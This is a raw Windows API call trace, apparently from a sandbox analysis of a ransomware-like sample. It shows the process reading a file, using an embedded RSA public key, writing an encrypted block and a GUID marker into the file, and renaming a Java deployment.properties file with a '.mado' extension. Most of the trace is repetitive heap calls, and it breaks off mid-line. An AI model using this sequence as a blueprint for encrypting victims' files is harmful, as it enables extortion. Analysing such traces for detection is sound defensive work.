[0206.678] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.681] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.681] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.682] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x2cf, lpOverlapped=0x0) returned 1 [0206.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.682] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0206.683] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.683] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.683] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.683] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.683] GetLastError () returned 0x0 [0206.683] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.683] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0206.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.683] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.683] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.684] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.684] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.684] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.684] WriteFile (in: hFile=0x63c, lpBuffer=0x3b816a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b816a8*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.684] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.684] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.684] CloseHandle (hObject=0x63c) returned 1 [0206.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d64f0 [0206.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0206.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d64f0 | out: hHeap=0x2c0000) returned 1 [0206.685] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.mado")) returned 1 [0206.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.686] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.687] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6be20 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x3b816a8 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bd78 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3293068 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d64f0 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6810 [0206.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d68d8 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bf70 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292de0 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6680 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6748 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d65b8 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0206.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bf70 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be20 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0206.688] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0206.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef128 [0206.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef1c0 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef128 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.688] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0206.688] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef4b8 | out: hHeap=0x2c0000) returned 1 [0206.688] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef4b8 [0206.688] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.694] RtlAllocateHeap 